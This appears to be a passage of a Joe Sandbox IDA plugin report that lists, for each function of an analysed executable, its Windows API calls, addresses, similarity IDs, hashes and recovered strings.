                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007F7021
                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007F7099
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow_memset
                                                • String ID:
                                                • API String ID: 830647256-0
                                                • Opcode ID: a1039c8f59c73b40afebc33c2e71b03ebf28f264beab7b674bc9795838b49f77
                                                • Instruction ID: d193586662fb6ac6dd25c8ef01f4c156c480ea23b97dece0999d19aa4a669f13
                                                • Opcode Fuzzy Hash: a1039c8f59c73b40afebc33c2e71b03ebf28f264beab7b674bc9795838b49f77
                                                • Instruction Fuzzy Hash: 17615975A00208AFDB10DFA4CC81EAE77F8EB49710F104169FA15AB3A1C778AD45DB60
                                                APIs
                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 007C6F15
                                                • SafeArrayAllocData.OLEAUT32(?), ref: 007C6F6E
                                                • VariantInit.OLEAUT32(?), ref: 007C6F80
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 007C6FA0
                                                • VariantCopy.OLEAUT32(?,?), ref: 007C6FF3
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 007C7007
                                                • VariantClear.OLEAUT32(?), ref: 007C701C
                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 007C7029
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007C7032
                                                • VariantClear.OLEAUT32(?), ref: 007C7044
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007C704F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                • String ID:
                                                • API String ID: 2706829360-0
                                                • Opcode ID: 1e23bfa8022f85a788433e53c78c3893dcbbdd5eaa93f60ffd83ea055bb1d342
                                                • Instruction ID: c5b482d17e4e4f90a8195bbe6688e14e89ba899db8c6c172a2b4ae18a4ff04f8
                                                • Opcode Fuzzy Hash: 1e23bfa8022f85a788433e53c78c3893dcbbdd5eaa93f60ffd83ea055bb1d342
                                                • Instruction Fuzzy Hash: 5F412D35A00219DFCB04DFA4D888EAEBBB9EF48354F00C06DE955A7261CB78A945CF94
                                                APIs
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                • CoInitialize.OLE32 ref: 007E8518
                                                • CoUninitialize.OLE32 ref: 007E8523
                                                • CoCreateInstance.OLE32(?,00000000,00000017,00802BEC,?), ref: 007E8583
                                                • IIDFromString.OLE32(?,?), ref: 007E85F6
                                                • VariantInit.OLEAUT32(?), ref: 007E8690
                                                • VariantClear.OLEAUT32(?), ref: 007E86F1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                • API String ID: 834269672-1287834457
                                                • Opcode ID: 68d999012018b47b47bdd33fba5504e7c6c8be94e00b2fc7a4b1c40aa79119e4
                                                • Instruction ID: 93d32130556266e03cce2cdaea10a84bfb7258fa821e8482b1a35579d5477fe9
                                                • Opcode Fuzzy Hash: 68d999012018b47b47bdd33fba5504e7c6c8be94e00b2fc7a4b1c40aa79119e4
                                                • Instruction Fuzzy Hash: 13618B70209351DFCB50DF25C848B6ABBE8AF48754F048819F9899B291CF78ED44CB92
                                                APIs
                                                • WSAStartup.WSOCK32(00000101,?), ref: 007E58A9
                                                • inet_addr.WSOCK32(?,?,?), ref: 007E58EE
                                                • gethostbyname.WSOCK32(?), ref: 007E58FA
                                                • IcmpCreateFile.IPHLPAPI ref: 007E5908
                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007E5978
                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007E598E
                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007E5A03
                                                • WSACleanup.WSOCK32 ref: 007E5A09
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                • String ID: Ping
                                                • API String ID: 1028309954-2246546115
                                                • Opcode ID: 9514bb01eedcfd812bbde52fdba9bab1245972aa72ecd0f7725da2749b0ce500
                                                • Instruction ID: a9c7754551bafbf41e1c5a07e47c37fdf749a408826fb365a769c1434caa1f2a
                                                • Opcode Fuzzy Hash: 9514bb01eedcfd812bbde52fdba9bab1245972aa72ecd0f7725da2749b0ce500
                                                • Instruction Fuzzy Hash: E951B031605740DFDB10AF25CC89B6AB7E4EF48724F048929F99ADB2A1DB78EC00CB51
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 007DB55C
                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007DB5D2
                                                • GetLastError.KERNEL32 ref: 007DB5DC
                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 007DB649
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                • API String ID: 4194297153-14809454
                                                • Opcode ID: bfc392b1b9bfeac66a9c2c82de731f9a61f4c5cf40e9bb3cd6accd07595ce843
                                                • Instruction ID: 27af82ac7e38a90787a6572eaeb49ee6915b24cbc5ab8f90ebcb4f66d1f4b760
                                                • Opcode Fuzzy Hash: bfc392b1b9bfeac66a9c2c82de731f9a61f4c5cf40e9bb3cd6accd07595ce843
                                                • Instruction Fuzzy Hash: 45319C75A00209DFCB00EFA4D889ABDB7B4FF44350F15802AE916E7391DB789A41CB91
                                                APIs
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                  • Part of subcall function 007CAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 007CAEC7
                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007C92D6
                                                • GetDlgCtrlID.USER32 ref: 007C92E1
                                                • GetParent.USER32 ref: 007C92FD
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 007C9300
                                                • GetDlgCtrlID.USER32(?), ref: 007C9309
                                                • GetParent.USER32(?), ref: 007C9325
                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 007C9328
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 1536045017-1403004172
                                                • Opcode ID: 7468eebf280f3788011b1a453e9493992f286873e14922d4f8050a602af2badb
                                                • Instruction ID: 797238486e704935b4765a24f2107788909054b258bb290871379e0faa227945
                                                • Opcode Fuzzy Hash: 7468eebf280f3788011b1a453e9493992f286873e14922d4f8050a602af2badb
                                                • Instruction Fuzzy Hash: AC21B070A00208BBDF04AB60CC89EFEBB64FF49310F108169F961972E1DF7D5816DA24
                                                APIs
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                  • Part of subcall function 007CAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 007CAEC7
                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007C93BF
                                                • GetDlgCtrlID.USER32 ref: 007C93CA
                                                • GetParent.USER32 ref: 007C93E6
                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 007C93E9
                                                • GetDlgCtrlID.USER32(?), ref: 007C93F2
                                                • GetParent.USER32(?), ref: 007C940E
                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 007C9411
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 1536045017-1403004172
                                                • Opcode ID: a1099708e6b9995455bd32de59b5f9d0134416923ee36e397c0b56c21e97f90f
                                                • Instruction ID: 07eb40624ea8ddab9d0cac1486d2192264ba8634c49ee8a1c4c367313b049168
                                                • Opcode Fuzzy Hash: a1099708e6b9995455bd32de59b5f9d0134416923ee36e397c0b56c21e97f90f
                                                • Instruction Fuzzy Hash: 1621A174A00208FBDF04ABA4CC89EFEBB64EF49300F108169F921972A1DF7D5916DA24
                                                APIs
                                                • GetParent.USER32 ref: 007C9431
                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 007C9446
                                                • _wcscmp.LIBCMT ref: 007C9458
                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007C94D3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                • API String ID: 1704125052-3381328864
                                                • Opcode ID: f6097f79e3f92ad81d34f77830bcf55ecd7b79c4535958f371c074c5f88c2251
                                                • Instruction ID: 26588a753421af4955e67f4e78f489ce7e007e11c589ecc95f1a69dd2ad6bc85
                                                • Opcode Fuzzy Hash: f6097f79e3f92ad81d34f77830bcf55ecd7b79c4535958f371c074c5f88c2251
                                                • Instruction Fuzzy Hash: 54110A7624C356F9FA142624FC0FEB7779CDF05320B20402EFA14E41E1FE5D5A928554
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 007E89EC
                                                • CoInitialize.OLE32(00000000), ref: 007E8A19
                                                • CoUninitialize.OLE32 ref: 007E8A23
                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 007E8B23
                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 007E8C50
                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00802C0C), ref: 007E8C84
                                                • CoGetObject.OLE32(?,00000000,00802C0C,?), ref: 007E8CA7
                                                • SetErrorMode.KERNEL32(00000000), ref: 007E8CBA
                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007E8D3A
                                                • VariantClear.OLEAUT32(?), ref: 007E8D4A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                • String ID:
                                                • API String ID: 2395222682-0
                                                • Opcode ID: 32492f8171ae20b4395204eba3ffe3649c03d00fb862ada394d3f0f9e4cf13d6
                                                • Instruction ID: ae14fb7282d9919549565e8466e45a4892129d8b0eaa35c835effd88df455e96
                                                • Opcode Fuzzy Hash: 32492f8171ae20b4395204eba3ffe3649c03d00fb862ada394d3f0f9e4cf13d6
                                                • Instruction Fuzzy Hash: 66C143B1209345AFC740DF65C88492BB7E9FF89348F00896DF58A9B260DB75ED05CB62
                                                APIs
                                                • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 007D7B15
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ArraySafeVartype
                                                • String ID:
                                                • API String ID: 1725837607-0
                                                • Opcode ID: bb3008c6693042514cb8d6a587a0a1a961391b6152b67b586f04f12fba73137c
                                                • Instruction ID: 93bb7c787d2269bc6f268428d5b078ca58c6e91d8da4999e483d2d80744a4c99
                                                • Opcode Fuzzy Hash: bb3008c6693042514cb8d6a587a0a1a961391b6152b67b586f04f12fba73137c
                                                • Instruction Fuzzy Hash: 60B19171A0421ADFDB14DF94C885BBEB7B5EF48321F24846AE505EB351E738A941CBA0
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 007D1521
                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,007D0599,?,00000001), ref: 007D1535
                                                • GetWindowThreadProcessId.USER32(00000000), ref: 007D153C
                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0599,?,00000001), ref: 007D154B
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 007D155D
                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0599,?,00000001), ref: 007D1576
                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007D0599,?,00000001), ref: 007D1588
                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007D0599,?,00000001), ref: 007D15CD
                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007D0599,?,00000001), ref: 007D15E2
                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007D0599,?,00000001), ref: 007D15ED
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                • String ID:
                                                • API String ID: 2156557900-0
                                                • Opcode ID: e61794d186cb354a6a5c920d490a46e6c911ca96e2871fc1c7097178dbcf5c41
                                                • Instruction ID: 7e044b56e118ea3b79851b88c2a8399889bd0949ad436e6d11229e0cc8fdc4cb
                                                • Opcode Fuzzy Hash: e61794d186cb354a6a5c920d490a46e6c911ca96e2871fc1c7097178dbcf5c41
                                                • Instruction Fuzzy Hash: 89312C75900204FBDB119F58FD84B7977BABB94311F50C426F906D62A0EF7C9960CB64
                                                APIs
                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0077FC06
                                                • OleUninitialize.OLE32(?,00000000), ref: 0077FCA5
                                                • UnregisterHotKey.USER32(?), ref: 0077FDFC
                                                • DestroyWindow.USER32(?), ref: 007B492F
                                                • FreeLibrary.KERNEL32(?), ref: 007B4994
                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 007B49C1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                • String ID: close all
                                                • API String ID: 469580280-3243417748
                                                • Opcode ID: dd27f2cc6a9f55fbed4b09b8b7f5a33a82d2da934fca48c0f43d8e428e4a0f8e
                                                • Instruction ID: a8ced8f4aaa402652c01c3bffd6be54613f68ea1db6d04bb0f8e1925fb177140
                                                • Opcode Fuzzy Hash: dd27f2cc6a9f55fbed4b09b8b7f5a33a82d2da934fca48c0f43d8e428e4a0f8e
                                                • Instruction Fuzzy Hash: FDA16F31701212DFCB29EF14C999B69F764FF04750F1582ADE90AAB262DB38AD12CF54
                                                APIs
                                                • EnumChildWindows.USER32(?,007CA844), ref: 007CA782
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ChildEnumWindows
                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                • API String ID: 3555792229-1603158881
                                                • Opcode ID: 43349577e6124a3255558992068c9cf3d3d1377b1655e7fb99c78bce7a65dabc
                                                • Instruction ID: 65f992e009babe5515c13efe2d8b695b10a33a68a632bcb17dbe552c12b7d067
                                                • Opcode Fuzzy Hash: 43349577e6124a3255558992068c9cf3d3d1377b1655e7fb99c78bce7a65dabc
                                                • Instruction Fuzzy Hash: EB91A070A0060AEBCF08DFA0D885FE9FB74BF04348F54811DD959A7151DB38A999DBA1
                                                APIs
                                                • SetWindowLongW.USER32(?,000000EB), ref: 00772EAE
                                                  • Part of subcall function 00771DB3: GetClientRect.USER32(?,?), ref: 00771DDC
                                                  • Part of subcall function 00771DB3: GetWindowRect.USER32(?,?), ref: 00771E1D
                                                  • Part of subcall function 00771DB3: ScreenToClient.USER32(?,?), ref: 00771E45
                                                • GetDC.USER32 ref: 007ACEB2
                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007ACEC5
                                                • SelectObject.GDI32(00000000,00000000), ref: 007ACED3
                                                • SelectObject.GDI32(00000000,00000000), ref: 007ACEE8
                                                • ReleaseDC.USER32(?,00000000), ref: 007ACEF0
                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007ACF7B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                • String ID: U
                                                • API String ID: 4009187628-3372436214
                                                • Opcode ID: f1247c8d2711637d9c651c051c63e6b10cf109ecbc3629ccb8d745762a9eecd9
                                                • Instruction ID: 8bf743b712e59acd2a7d9e6d3fa349739de2e735728f1a35a7215a1f84004575
                                                • Opcode Fuzzy Hash: f1247c8d2711637d9c651c051c63e6b10cf109ecbc3629ccb8d745762a9eecd9
                                                • Instruction Fuzzy Hash: E371C531500205EFCF229F64C884ABA7BB6FF8A350F14836AFD655A266C7398C41DF61
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007E1B66
                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007E1B92
                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 007E1BD4
                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 007E1BE9
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E1BF6
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 007E1C26
                                                • InternetCloseHandle.WININET(00000000), ref: 007E1C6D
                                                  • Part of subcall function 007E2599: GetLastError.KERNEL32(?,?,007E192D,00000000,00000000,00000001), ref: 007E25AE
                                                  • Part of subcall function 007E2599: SetEvent.KERNEL32(?,?,007E192D,00000000,00000000,00000001), ref: 007E25C3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                • String ID:
                                                • API String ID: 2603140658-3916222277
                                                • Opcode ID: 53a12671750ef61218c4f1261ccedf607d6f2265b0f441fed856bbdcc3c71cde
                                                • Instruction ID: 8e5473055a546272d3a832acf7dc012465af89e5df8abf27d8fcdc00ae9bd6e4
                                                • Opcode Fuzzy Hash: 53a12671750ef61218c4f1261ccedf607d6f2265b0f441fed856bbdcc3c71cde
                                                • Instruction Fuzzy Hash: D1417EB1502248BFEB119F61CC8AFBB77ACFF08354F508126F9059A151EB789D45CBA4
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,007FF910), ref: 007E8E3D
                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007FF910), ref: 007E8E71
                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007E8FEB
                                                • SysFreeString.OLEAUT32(?), ref: 007E9015
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
